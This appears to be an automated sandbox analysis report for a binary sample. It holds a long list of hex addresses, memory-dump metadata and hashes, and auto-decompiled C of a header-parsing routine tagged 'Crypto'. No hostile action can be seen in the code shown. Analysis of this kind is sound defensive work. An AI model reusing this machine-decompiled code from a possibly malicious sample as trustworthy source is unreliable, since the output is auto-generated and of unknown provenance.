                                                    0x00cedc24
                                                    0x00cedc31
                                                    0x00cedc26
                                                    0x00cedc29
                                                    0x00cedc29
                                                    0x00cedc24
                                                    0x00cedb4c
                                                    0x00cedc64
                                                    0x00cedc6f
                                                    0x00cedc70
                                                    0x00cedc71
                                                    0x00cedc77
                                                    0x00cedc7d
                                                    0x00cedc83
                                                    0x00cedc83
                                                    0x00000000
                                                    0x00cedabc
                                                    0x00000000
                                                    0x00cedaa2
                                                    0x00cedc84
                                                    0x00cedc8a
                                                    0x00cedc91
                                                    0x00cedc92
                                                    0x00cedc93
                                                    0x00cedc98
                                                    0x00cedc98
                                                    0x00cee0fc
                                                    0x00cee106
                                                    0x00cee107
                                                    0x00cee10d
                                                    0x00cee10f
                                                    0x00cee578
                                                    0x00cee57a
                                                    0x00cee57c
                                                    0x00cee582
                                                    0x00cee584
                                                    0x00cee58a
                                                    0x00cee58c
                                                    0x00cee8de
                                                    0x00cee8de
                                                    0x00cee8e0
                                                    0x00cee8e6
                                                    0x00cee8ed
                                                    0x00cee8f3
                                                    0x00cee8f5
                                                    0x00cee993
                                                    0x00cee993
                                                    0x00cee995
                                                    0x00cee996
                                                    0x00cee99c
                                                    0x00000000
                                                    0x00cee8fb
                                                    0x00cee8fb
                                                    0x00cee8fe
                                                    0x00cee904
                                                    0x00cee90a
                                                    0x00cee90c
                                                    0x00cee912
                                                    0x00cee914
                                                    0x00cee914
                                                    0x00cee916
                                                    0x00cee916
                                                    0x00cee91f
                                                    0x00cee926
                                                    0x00cee92c
                                                    0x00cee92f
                                                    0x00cee930
                                                    0x00cee932
                                                    0x00cee932
                                                    0x00cee936
                                                    0x00cee938
                                                    0x00cee93a
                                                    0x00cee940
                                                    0x00cee943
                                                    0x00000000
                                                    0x00cee945
                                                    0x00cee945
                                                    0x00cee94c
                                                    0x00cee94c
                                                    0x00cee943
                                                    0x00cee938
                                                    0x00cee90c
                                                    0x00cee8fe
                                                    0x00cee8f5
                                                    0x00cee592
                                                    0x00cee592
                                                    0x00cee592
                                                    0x00cee595
                                                    0x00cee599
                                                    0x00cee599
                                                    0x00cee59a
                                                    0x00cee5ac
                                                    0x00cee5b9
                                                    0x00cee5c8
                                                    0x00cee5f2
                                                    0x00cee5f7
                                                    0x00cee5fd
                                                    0x00cee600
                                                    0x00cee606
                                                    0x00cee609
                                                    0x00cee6a2
                                                    0x00cee6a9
                                                    0x00cee727
                                                    0x00cee72d
                                                    0x00cee733
                                                    0x00cee736
                                                    0x00cee738
                                                    0x00cee7c1
                                                    0x00cee73e
                                                    0x00cee73e
                                                    0x00cee744
                                                    0x00cee744
                                                    0x00cee74a
                                                    0x00cee750
                                                    0x00cee752
                                                    0x00cee754
                                                    0x00cee754
                                                    0x00cee75a
                                                    0x00cee760
                                                    0x00cee762
                                                    0x00cee76a
                                                    0x00cee76a
                                                    0x00cee770
                                                    0x00cee772
                                                    0x00cee774
                                                    0x00cee77a
                                                    0x00cee77c
                                                    0x00cee893
                                                    0x00cee895
                                                    0x00cee89b
                                                    0x00cee89b
                                                    0x00cee89e
                                                    0x00cee89f
                                                    0x00000000
                                                    0x00cee782
                                                    0x00cee788
                                                    0x00cee788
                                                    0x00cee78a
                                                    0x00cee790
                                                    0x00cee793
                                                    0x00cee79a
                                                    0x00cee7a0
                                                    0x00cee7a2
                                                    0x00cee7c9
                                                    0x00cee7cb
                                                    0x00cee7cd
                                                    0x00cee7cf
                                                    0x00cee7d5
                                                    0x00cee7db
                                                    0x00cee875
                                                    0x00cee875
                                                    0x00cee878
                                                    0x00000000
                                                    0x00cee87e
                                                    0x00cee87e
                                                    0x00cee884
                                                    0x00000000
                                                    0x00cee884
                                                    0x00cee7e1
                                                    0x00cee7e1
                                                    0x00cee7e1
                                                    0x00cee7e4
                                                    0x00000000
                                                    0x00000000
                                                    0x00cee7e6
                                                    0x00cee7e8
                                                    0x00cee7ea
                                                    0x00cee7f3
                                                    0x00cee7f3
                                                    0x00cee7f5
                                                    0x00cee7fb
                                                    0x00cee7fb
                                                    0x00cee807
                                                    0x00cee812
                                                    0x00cee815
                                                    0x00cee822
                                                    0x00cee825
                                                    0x00cee826
                                                    0x00cee827
                                                    0x00cee82d
                                                    0x00cee82f
                                                    0x00cee835
                                                    0x00cee83b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cee83d
                                                    0x00cee83d
                                                    0x00cee83d
                                                    0x00cee83f
                                                    0x00000000
                                                    0x00000000
                                                    0x00cee841
                                                    0x00cee844
                                                    0x00000000
                                                    0x00cee84a
                                                    0x00cee84a
                                                    0x00cee84c
                                                    0x00cee84e
                                                    0x00cee84e
                                                    0x00cee84e
                                                    0x00cee856
                                                    0x00cee859
                                                    0x00cee859
                                                    0x00cee85f
                                                    0x00cee861
                                                    0x00cee863
                                                    0x00cee86a
                                                    0x00cee870
                                                    0x00cee872
                                                    0x00000000
                                                    0x00cee872
                                                    0x00000000
                                                    0x00cee844
                                                    0x00000000
                                                    0x00cee83d
                                                    0x00000000
                                                    0x00cee7e1
                                                    0x00cee7a4
                                                    0x00cee7a4
                                                    0x00cee7a6
                                                    0x00cee7ac
                                                    0x00cee7b3
                                                    0x00cee7b3
                                                    0x00cee7b6
                                                    0x00cee7b6
                                                    0x00000000
                                                    0x00cee7a6
                                                    0x00000000
                                                    0x00cee88a
                                                    0x00cee88a
                                                    0x00cee88b
                                                    0x00cee88b
                                                    0x00000000
                                                    0x00cee790
                                                    0x00cee6ab
                                                    0x00cee6ab
                                                    0x00cee6bd
                                                    0x00cee6cc
                                                    0x00cee6d1
                                                    0x00cee6d4
                                                    0x00cee6d6
                                                    0x00000000
                                                    0x00cee6dc
                                                    0x00cee6dc
                                                    0x00cee6df
                                                    0x00000000
                                                    0x00cee6e5
                                                    0x00cee6e5
                                                    0x00cee6ec
                                                    0x00000000
                                                    0x00cee6f2
                                                    0x00cee6f8
                                                    0x00cee6fa
                                                    0x00cee700
                                                    0x00cee700
                                                    0x00cee702
                                                    0x00cee702
                                                    0x00cee704
                                                    0x00cee70d
                                                    0x00cee714
                                                    0x00cee717
                                                    0x00cee718
                                                    0x00cee71a
                                                    0x00cee71a
                                                    0x00000000
                                                    0x00cee722
                                                    0x00cee6ec
                                                    0x00cee6df
                                                    0x00cee6d6
                                                    0x00cee60f
                                                    0x00cee60f
                                                    0x00cee615
                                                    0x00cee617
                                                    0x00cee633
                                                    0x00cee636
                                                    0x00000000
                                                    0x00cee63c
                                                    0x00cee63c
                                                    0x00cee643
                                                    0x00000000
                                                    0x00cee649
                                                    0x00cee64f
                                                    0x00cee651
                                                    0x00cee657
                                                    0x00cee657
                                                    0x00cee659
                                                    0x00cee659
                                                    0x00cee65b
                                                    0x00cee664
                                                    0x00cee66b
                                                    0x00cee66e
                                                    0x00cee66f
                                                    0x00cee671
                                                    0x00cee671
                                                    0x00cee679
                                                    0x00cee679
                                                    0x00cee67b
                                                    0x00000000
                                                    0x00cee681
                                                    0x00cee681
                                                    0x00cee687
                                                    0x00cee68a
                                                    0x00cee954
                                                    0x00cee957
                                                    0x00cee95d
                                                    0x00cee972
                                                    0x00cee977
                                                    0x00cee97a
                                                    0x00cee690
                                                    0x00cee690
                                                    0x00cee697
                                                    0x00000000
                                                    0x00cee697
                                                    0x00cee68a
                                                    0x00cee67b
                                                    0x00cee643
                                                    0x00cee619
                                                    0x00cee619
                                                    0x00cee61b
                                                    0x00cee621
                                                    0x00cee627
                                                    0x00cee628
                                                    0x00cee8a5
                                                    0x00cee8a5
                                                    0x00cee8ac
                                                    0x00cee8ad
                                                    0x00cee8ae
                                                    0x00cee8b3
                                                    0x00cee8b6
                                                    0x00cee8b6
                                                    0x00cee8b6
                                                    0x00cee617
                                                    0x00cee8b8
                                                    0x00cee8b8
                                                    0x00cee8ba
                                                    0x00cee981
                                                    0x00cee988
                                                    0x00cee98f
                                                    0x00cee9a2
                                                    0x00cee9a8
                                                    0x00cee9a9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cee8c0
                                                    0x00cee8c6
                                                    0x00cee8c6
                                                    0x00cee8cc
                                                    0x00cee8cc
                                                    0x00cee8d8
                                                    0x00000000
                                                    0x00cee8d8
                                                    0x00cee115
                                                    0x00cee115
                                                    0x00cee117
                                                    0x00cee11d
                                                    0x00cee11f
                                                    0x00cee125
                                                    0x00cee127
                                                    0x00cee49e
                                                    0x00cee49e
                                                    0x00cee4a0
                                                    0x00cee4a6
                                                    0x00cee4ad
                                                    0x00cee4af
                                                    0x00cee50e
                                                    0x00cee511
                                                    0x00cee517
                                                    0x00cee51d
                                                    0x00cee523
                                                    0x00cee525
                                                    0x00cee52b
                                                    0x00cee52d
                                                    0x00cee52d
                                                    0x00cee52f
                                                    0x00cee52f
                                                    0x00cee531
                                                    0x00cee53a
                                                    0x00cee541
                                                    0x00cee544
                                                    0x00cee545
                                                    0x00cee547
                                                    0x00cee547
                                                    0x00cee54f
                                                    0x00cee551
                                                    0x00cee557
                                                    0x00cee55d
                                                    0x00cee560
                                                    0x00000000
                                                    0x00cee566
                                                    0x00cee566
                                                    0x00cee56d
                                                    0x00cee56d
                                                    0x00cee560
                                                    0x00cee551
                                                    0x00cee525
                                                    0x00cee4b1
                                                    0x00cee4b1
                                                    0x00cee4b3
                                                    0x00cee4b9
                                                    0x00cee4bf
                                                    0x00000000
                                                    0x00cee4bf
                                                    0x00cee4af
                                                    0x00cee12d
                                                    0x00cee12d
                                                    0x00cee12d
                                                    0x00cee130
                                                    0x00cee134
                                                    0x00cee134
                                                    0x00cee135
                                                    0x00cee147
                                                    0x00cee154
                                                    0x00cee163
                                                    0x00cee18d
                                                    0x00cee192
                                                    0x00cee198
                                                    0x00cee19b
                                                    0x00cee1a1
                                                    0x00cee1a4
                                                    0x00cee220
                                                    0x00cee227
                                                    0x00cee2eb
                                                    0x00cee2f1
                                                    0x00cee2f7
                                                    0x00cee2fa
                                                    0x00cee2fc
                                                    0x00cee385
                                                    0x00cee302
                                                    0x00cee302
                                                    0x00cee308
                                                    0x00cee308
                                                    0x00cee30e
                                                    0x00cee314
                                                    0x00cee316
                                                    0x00cee318
                                                    0x00cee318
                                                    0x00cee31e
                                                    0x00cee324
                                                    0x00cee326
                                                    0x00cee32e
                                                    0x00cee32e
                                                    0x00cee334
                                                    0x00cee336
                                                    0x00cee338
                                                    0x00cee33e
                                                    0x00cee340
                                                    0x00cee457
                                                    0x00cee459
                                                    0x00cee45f
                                                    0x00cee45f
                                                    0x00000000
                                                    0x00cee346
                                                    0x00cee34c
                                                    0x00cee34c
                                                    0x00cee34e
                                                    0x00cee354
                                                    0x00cee357
                                                    0x00cee35e
                                                    0x00cee364
                                                    0x00cee366
                                                    0x00cee38d
                                                    0x00cee38f
                                                    0x00cee391
                                                    0x00cee393
                                                    0x00cee399
                                                    0x00cee39f
                                                    0x00cee439
                                                    0x00cee439
                                                    0x00cee43c
                                                    0x00000000
                                                    0x00cee442
                                                    0x00cee442
                                                    0x00cee448
                                                    0x00000000
                                                    0x00cee448
                                                    0x00cee3a5
                                                    0x00cee3a5
                                                    0x00cee3a5
                                                    0x00cee3a8
                                                    0x00000000
                                                    0x00000000
                                                    0x00cee3aa
                                                    0x00cee3ac
                                                    0x00cee3ae
                                                    0x00cee3b7
                                                    0x00cee3b7
                                                    0x00cee3b9
                                                    0x00cee3bf
                                                    0x00cee3bf
                                                    0x00cee3cb
                                                    0x00cee3d6
                                                    0x00cee3d9
                                                    0x00cee3e6
                                                    0x00cee3e9
                                                    0x00cee3ea
                                                    0x00cee3eb
                                                    0x00cee3f1
                                                    0x00cee3f3
                                                    0x00cee3f9
                                                    0x00cee3ff
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cee401
                                                    0x00cee401
                                                    0x00cee401
                                                    0x00cee403
                                                    0x00000000
                                                    0x00000000
                                                    0x00cee405
                                                    0x00cee408
                                                    0x00cee4c2
                                                    0x00cee4c2
                                                    0x00cee4c4
                                                    0x00cee4ca
                                                    0x00cee4d0
                                                    0x00cee4d1
                                                    0x00000000
                                                    0x00cee40e
                                                    0x00cee40e
                                                    0x00cee410
                                                    0x00cee412
                                                    0x00cee412
                                                    0x00cee412
                                                    0x00cee41a
                                                    0x00cee41d
                                                    0x00cee41d
                                                    0x00cee423
                                                    0x00cee425
                                                    0x00cee427
                                                    0x00cee42e
                                                    0x00cee434
                                                    0x00cee436
                                                    0x00000000
                                                    0x00cee436
                                                    0x00000000
                                                    0x00cee408
                                                    0x00000000
                                                    0x00cee401
                                                    0x00000000
                                                    0x00cee3a5
                                                    0x00cee368
                                                    0x00cee368
                                                    0x00cee36a
                                                    0x00cee370
                                                    0x00cee377
                                                    0x00cee377
                                                    0x00cee37a
                                                    0x00cee37a
                                                    0x00000000
                                                    0x00cee36a
                                                    0x00000000
                                                    0x00cee44e
                                                    0x00cee44e
                                                    0x00cee44f
                                                    0x00cee44f
                                                    0x00000000
                                                    0x00cee354
                                                    0x00cee22d
                                                    0x00cee22d
                                                    0x00cee23f
                                                    0x00cee24e
                                                    0x00cee253
                                                    0x00cee256
                                                    0x00cee258
                                                    0x00cee274
                                                    0x00cee277
                                                    0x00000000
                                                    0x00cee27d
                                                    0x00cee27d
                                                    0x00cee284
                                                    0x00000000
                                                    0x00cee28a
                                                    0x00cee290
                                                    0x00cee292
                                                    0x00cee298
                                                    0x00cee298
                                                    0x00cee29a
                                                    0x00cee29a
                                                    0x00cee29c
                                                    0x00cee2a5
                                                    0x00cee2ac
                                                    0x00cee2af
                                                    0x00cee2b0
                                                    0x00cee2b2
                                                    0x00cee2b2
                                                    0x00000000
                                                    0x00cee29a
                                                    0x00cee284
                                                    0x00cee25a
                                                    0x00cee25c
                                                    0x00cee262
                                                    0x00cee268
                                                    0x00cee269
                                                    0x00000000
                                                    0x00cee269
                                                    0x00cee258
                                                    0x00cee1a6
                                                    0x00cee1a6
                                                    0x00cee1ac
                                                    0x00cee1ae
                                                    0x00cee1c3
                                                    0x00cee1c6
                                                    0x00000000
                                                    0x00cee1cc
                                                    0x00cee1cc
                                                    0x00cee1d3
                                                    0x00000000
                                                    0x00cee1d9
                                                    0x00cee1df
                                                    0x00cee1e1
                                                    0x00cee1e7
                                                    0x00cee1e7
                                                    0x00cee1e9
                                                    0x00cee1e9
                                                    0x00cee1eb
                                                    0x00cee1f4
                                                    0x00cee1fb
                                                    0x00cee1fe
                                                    0x00cee1ff
                                                    0x00cee201
                                                    0x00cee201
                                                    0x00cee2ba
                                                    0x00cee2ba
                                                    0x00cee2bc
                                                    0x00000000
                                                    0x00cee2c2
                                                    0x00cee2c2
                                                    0x00cee2c8
                                                    0x00cee2cb
                                                    0x00cee20e
                                                    0x00cee215
                                                    0x00000000
                                                    0x00cee2d1
                                                    0x00cee2d3
                                                    0x00cee2d9
                                                    0x00cee2df
                                                    0x00cee2e0
                                                    0x00cee4d7
                                                    0x00cee4d7
                                                    0x00cee4de
                                                    0x00cee4df
                                                    0x00cee4e0
                                                    0x00cee4e5
                                                    0x00cee4e8
                                                    0x00cee4e8
                                                    0x00cee2cb
                                                    0x00cee2bc
                                                    0x00cee1d3
                                                    0x00cee1b0
                                                    0x00cee1b0
                                                    0x00cee1b2
                                                    0x00cee1b8
                                                    0x00cee462
                                                    0x00cee462
                                                    0x00cee463
                                                    0x00cee469
                                                    0x00cee469
                                                    0x00cee470
                                                    0x00cee471
                                                    0x00cee472
                                                    0x00cee477
                                                    0x00cee47a
                                                    0x00cee47a
                                                    0x00cee47a
                                                    0x00cee1ae
                                                    0x00cee47c
                                                    0x00cee47c
                                                    0x00cee47e
                                                    0x00cee4ec
                                                    0x00cee4f3
                                                    0x00cee4f3
                                                    0x00cee4f3
                                                    0x00cee4fa
                                                    0x00cee4fc
                                                    0x00cee502
                                                    0x00cee503
                                                    0x00cee9af
                                                    0x00cee9af
                                                    0x00cee9b0
                                                    0x00cee9b1
                                                    0x00cee9b6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cee480
                                                    0x00cee486
                                                    0x00cee486
                                                    0x00cee48c
                                                    0x00cee48c
                                                    0x00cee498
                                                    0x00000000
                                                    0x00cee498
                                                    0x00cee127
                                                    0x00cee9b9
                                                    0x00cee9b9
                                                    0x00cee9bf
                                                    0x00cee9c1
                                                    0x00cee9c7
                                                    0x00cee9cd
                                                    0x00cee9cf
                                                    0x00cee9d1
                                                    0x00cee9d3
                                                    0x00cee9d3
                                                    0x00cee9d5
                                                    0x00cee9d5
                                                    0x00cee9de
                                                    0x00cee9df
                                                    0x00cee9e3
                                                    0x00cee9ea
                                                    0x00cee9ed
                                                    0x00cee9ee
                                                    0x00cee9f0
                                                    0x00cee9f0
                                                    0x00cee9f4
                                                    0x00cee9fa
                                                    0x00cee9fc
                                                    0x00ceea02
                                                    0x00ceea04
                                                    0x00ceea0a
                                                    0x00ceea0d
                                                    0x00ceea20
                                                    0x00ceea23
                                                    0x00ceea29
                                                    0x00ceea3e
                                                    0x00ceea43
                                                    0x00ceea0f
                                                    0x00ceea11
                                                    0x00ceea18
                                                    0x00ceea18
                                                    0x00ceea0d
                                                    0x00ceea46
                                                    0x00ceea46
                                                    0x00ceea56
                                                    0x00ceea5f
                                                    0x00ceea60
                                                    0x00ceea62
                                                    0x00ceeaf9
                                                    0x00ceeafb
                                                    0x00ceeb06
                                                    0x00ceeb06
                                                    0x00ceeb08
                                                    0x00ceeb0b
                                                    0x00ceeb0d
                                                    0x00000000
                                                    0x00ceeafd
                                                    0x00ceeb03
                                                    0x00ceeb03
                                                    0x00ceea68
                                                    0x00ceea68
                                                    0x00ceea6e
                                                    0x00ceea71
                                                    0x00ceea77
                                                    0x00ceea7a
                                                    0x00ceea80
                                                    0x00ceea82
                                                    0x00ceea88
                                                    0x00ceea8a
                                                    0x00ceea8c
                                                    0x00ceea8c
                                                    0x00ceea8e
                                                    0x00ceea8e
                                                    0x00ceea9b
                                                    0x00ceeaa2
                                                    0x00ceeaa5
                                                    0x00ceeaa6
                                                    0x00ceeaa8
                                                    0x00ceeaa9
                                                    0x00ceeaa9
                                                    0x00ceeaad
                                                    0x00ceeab3
                                                    0x00ceeab5
                                                    0x00ceeab7
                                                    0x00ceeabd
                                                    0x00ceeac0
                                                    0x00ceead4
                                                    0x00ceeada
                                                    0x00ceeaef
                                                    0x00ceeaf4
                                                    0x00ceeac2
                                                    0x00ceeac2
                                                    0x00ceeac9
                                                    0x00ceeac9
                                                    0x00ceeac0
                                                    0x00ceeab5
                                                    0x00ceeb13
                                                    0x00ceeb13
                                                    0x00ceeb13
                                                    0x00ceeb1f
                                                    0x00ceeb22
                                                    0x00ceeb28
                                                    0x00ceeb2a
                                                    0x00ceeb2c
                                                    0x00ceeb32
                                                    0x00ceeb34
                                                    0x00ceeb34
                                                    0x00ceeb34
                                                    0x00ceeb32
                                                    0x00ceeb39
                                                    0x00ceeb3a
                                                    0x00ceeb3c
                                                    0x00ceeb3e
                                                    0x00ceeb3e
                                                    0x00ceeb40
                                                    0x00ceeb46
                                                    0x00ceeb4c
                                                    0x00ceeb4e
                                                    0x00ceeb54
                                                    0x00ceeb54
                                                    0x00ceeb5a
                                                    0x00ceeb5c
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceeb62
                                                    0x00ceeb64
                                                    0x00ceeb66
                                                    0x00ceeb66
                                                    0x00ceeb68
                                                    0x00ceeb68
                                                    0x00ceeb78
                                                    0x00ceeb7f
                                                    0x00ceeb82
                                                    0x00ceeb83
                                                    0x00ceeb85
                                                    0x00ceeb85
                                                    0x00ceeb89
                                                    0x00ceeb8f
                                                    0x00ceeb91
                                                    0x00ceeb93
                                                    0x00ceeb99
                                                    0x00ceeb9c
                                                    0x00ceebad
                                                    0x00ceebb0
                                                    0x00ceebb6
                                                    0x00ceebcb
                                                    0x00ceebd0
                                                    0x00ceeb9e
                                                    0x00ceeb9e
                                                    0x00ceeba5
                                                    0x00ceeba5
                                                    0x00ceeb9c
                                                    0x00ceebe1
                                                    0x00ceebf0
                                                    0x00ceebf1
                                                    0x00ceebf1
                                                    0x00ceebf3
                                                    0x00ceebf5
                                                    0x00ceebf5
                                                    0x00ceebfb
                                                    0x00ceebfe
                                                    0x00ceec00
                                                    0x00ceec02
                                                    0x00ceec02
                                                    0x00ceec05
                                                    0x00ceec06
                                                    0x00ceec06
                                                    0x00ceec0b
                                                    0x00ceec0e
                                                    0x00ceec12
                                                    0x00ceec12
                                                    0x00ceec13
                                                    0x00ceec15
                                                    0x00ceec1b
                                                    0x00ceec21
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceec21
                                                    0x00ceeb54
                                                    0x00ceec27
                                                    0x00ceec27
                                                    0x00000000
                                                    0x00ceec27
                                                    0x00ced9ac
                                                    0x00ced9a3
                                                    0x00ced99a
                                                    0x00ced951
                                                    0x00ced955
                                                    0x00ced95d
                                                    0x00000000
                                                    0x00ced95f
                                                    0x00ced965
                                                    0x00ced96a
                                                    0x00ceec46
                                                    0x00ceec46
                                                    0x00ceec49
                                                    0x00ceec54
                                                    0x00ceec7f
                                                    0x00ceec80
                                                    0x00ceec81
                                                    0x00ceec82
                                                    0x00ceec83
                                                    0x00ceec84
                                                    0x00ceec89
                                                    0x00ceec8a
                                                    0x00ceec91
                                                    0x00ceec96
                                                    0x00ceec9c
                                                    0x00ceeca1
                                                    0x00ceeca2
                                                    0x00ceeca2
                                                    0x00ceeca2
                                                    0x00ceeca8
                                                    0x00ceeca9
                                                    0x00ceeca9
                                                    0x00ceecac
                                                    0x00ceecb2
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceecb4
                                                    0x00ceecb9
                                                    0x00ceecbc
                                                    0x00ceecbe
                                                    0x00ceecc6
                                                    0x00ceecc8
                                                    0x00ceecca
                                                    0x00ceeccf
                                                    0x00ceecd2
                                                    0x00ceecd8
                                                    0x00ceecdb
                                                    0x00ceecdd
                                                    0x00ceecdd
                                                    0x00ceecdd
                                                    0x00ceecdd
                                                    0x00ceecdb
                                                    0x00ceece0
                                                    0x00ceecec
                                                    0x00ceecf2
                                                    0x00ceecfa
                                                    0x00ceecff
                                                    0x00ceed00
                                                    0x00ceed05
                                                    0x00ceed05
                                                    0x00ceed05
                                                    0x00ceed05
                                                    0x00ceed09
                                                    0x00ceed09
                                                    0x00ceed0c
                                                    0x00ceed13
                                                    0x00ceed20
                                                    0x00ceec56
                                                    0x00ceec56
                                                    0x00ceec56
                                                    0x00ceec5d
                                                    0x00ceec5e
                                                    0x00ceec5f
                                                    0x00ceec60
                                                    0x00ceec69
                                                    0x00ceec6e
                                                    0x00ceec7c
                                                    0x00ceec7c
                                                    0x00ceec54
                                                    0x00ced95d

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 4168288129-2761157908
                                                    • Opcode ID: b269815ada3de57b6cfbccba0419be46c986456eeae32ea18159d8e25861effd
                                                    • Instruction ID: d7b4d547dd0cb42a2ab54b640686fe24ef419c251bc29d0d9245466d2fbaa64b
                                                    • Opcode Fuzzy Hash: b269815ada3de57b6cfbccba0419be46c986456eeae32ea18159d8e25861effd
                                                    • Instruction Fuzzy Hash: B4C26C72E086688FDB25CF2ADD407EAB7B5EB44344F1541EAD45EE7280E774AE818F40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E00CC32F7(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				void* _t237;
				signed int _t240;
				void* _t246;
				unsigned int _t248;
				unsigned int _t252;
				void* _t253;
				signed int _t257;
				char _t269;
				signed int _t277;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t319;
				signed int _t328;
				signed int _t329;
				signed int _t331;
				signed int _t335;
				signed int _t350;
				signed char _t352;
				unsigned int _t363;
				intOrPtr _t370;
				void* _t373;
				intOrPtr _t374;
				void* _t381;
				signed int _t383;
				void* _t384;
				signed int _t395;
				intOrPtr* _t399;
				signed int _t414;
				signed int _t423;
				char _t432;
				signed int _t433;
				signed int _t438;
				signed int _t442;
				intOrPtr _t450;
				unsigned int _t456;
				unsigned int _t459;
				signed int _t463;
				signed int _t471;
				signed int _t480;
				signed int _t485;
				signed int _t500;
				signed int _t502;
				signed char _t503;
				signed int _t504;
				unsigned int _t505;
				intOrPtr _t514;
				void* _t515;
				void* _t522;
				signed int _t525;
				void* _t526;
				signed int _t536;
				void* _t542;
				void* _t544;
				intOrPtr _t547;
				void* _t548;
				void* _t550;
				void* _t551;
				intOrPtr _t561;

				_t551 = _t550 - 0x68;
				E00CDEB78(0xcf26be, _t548);
				E00CDEC50(0x2068);
				_t399 = __ecx;
				E00CCCB83(_t548 + 0x30, __ecx);
				 *(_t548 + 0x64) = 0;
				 *((intOrPtr*)(_t548 - 4)) = 0;
				if( *((intOrPtr*)(__ecx + 0x6cd4)) == 0) {
					L18:
					 *((char*)(_t548 + 0x6a)) = 0;
					L19:
					_push(7);
					_t237 = E00CCCD8A();
					__eflags = _t237 - 7;
					if(_t237 >= 7) {
						 *(_t399 + 0x220c) = 0;
						 *(_t399 + 0x21fc) = E00CCCBFB(_t548 + 0x30);
						_t536 = E00CCCD66(_t548 + 0x30, 4);
						_t240 = E00CCCCFB();
						__eflags = _t240 | _t500;
						if((_t240 | _t500) == 0) {
							L88:
							E00CC20D7(_t399);
							L89:
							E00CC15FB(_t548 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t548 - 0xc));
							return  *(_t548 + 0x64);
						}
						__eflags = _t536;
						if(_t536 == 0) {
							goto L88;
						}
						_t46 = _t536 + 4; // 0x4
						_t47 = _t536 - 3; // -3
						_t514 = _t46 + _t240;
						_t414 = _t47 + _t240;
						__eflags = _t414;
						if(_t414 < 0) {
							goto L88;
						}
						__eflags = _t514 - 7;
						if(_t514 < 7) {
							goto L88;
						}
						_push(_t414);
						E00CCCD8A();
						__eflags =  *(_t548 + 0x48) - _t514;
						if( *(_t548 + 0x48) < _t514) {
							goto L20;
						}
						_t246 = E00CCCCDB(_t548 + 0x30);
						 *(_t399 + 0x2200) = E00CCCCFB();
						_t248 = E00CCCCFB();
						 *(_t399 + 0x2204) = _t248;
						 *((intOrPtr*)(_t399 + 0x2208)) = _t514;
						_t515 = _t399 + 0x21fc;
						 *(_t399 + 0x220c) = _t248 >> 0x00000002 & 0x00000001;
						__eflags =  *_t515 - _t246;
						 *(_t399 + 0x21f4) =  *(_t399 + 0x2200);
						_t60 = _t548 + 0x6b;
						 *_t60 =  *_t515 != _t246;
						__eflags =  *_t60;
						if( *_t60 == 0) {
							L29:
							_t252 = 0;
							__eflags =  *(_t399 + 0x2204) & 0x00000001;
							 *(_t548 + 0x58) = 0;
							 *(_t548 + 0x54) = 0;
							if(( *(_t399 + 0x2204) & 0x00000001) == 0) {
								L33:
								__eflags =  *(_t399 + 0x2204) & 0x00000002;
								_t539 = _t252;
								 *(_t548 + 0x60) = _t252;
								 *(_t548 + 0x5c) = _t252;
								if(( *(_t399 + 0x2204) & 0x00000002) != 0) {
									_t363 = E00CCCCFB();
									_t539 = _t363;
									 *(_t548 + 0x60) = _t363;
									 *(_t548 + 0x5c) = _t500;
								}
								_t253 = E00CC1983(_t399,  *((intOrPtr*)(_t399 + 0x2208)));
								asm("adc ecx, edx");
								 *((intOrPtr*)(_t399 + 0x6cc0)) = E00CC3EFB(_t253 +  *((intOrPtr*)(_t399 + 0x6cb8)),  *((intOrPtr*)(_t399 + 0x6cbc)), _t539,  *(_t548 + 0x5c), 0, 0);
								 *((intOrPtr*)(_t399 + 0x6cc4)) = 0;
								_t502 =  *(_t399 + 0x2200);
								_t257 = _t502 - 1;
								__eflags = _t257;
								if(_t257 == 0) {
									E00CCAD5E(_t399 + 0x2220);
									_t423 = 5;
									memcpy(_t399 + 0x2220, _t515, _t423 << 2);
									_t503 = E00CCCCFB();
									 *(_t399 + 0x6ccd) = _t503 & 1;
									 *(_t399 + 0x6ccc) = _t503 >> 0x00000002 & 1;
									_t432 = 1;
									 *((char*)(_t399 + 0x6cd2)) = 1;
									 *(_t399 + 0x6ccf) = _t503 >> 0x00000004 & 1;
									 *(_t399 + 0x6cd3) = _t503 >> 0x00000003 & 1;
									_t269 = 0;
									 *((char*)(_t399 + 0x6cd0)) = 0;
									__eflags = _t503 & 0x00000002;
									if((_t503 & 0x00000002) == 0) {
										_t504 = 0;
									} else {
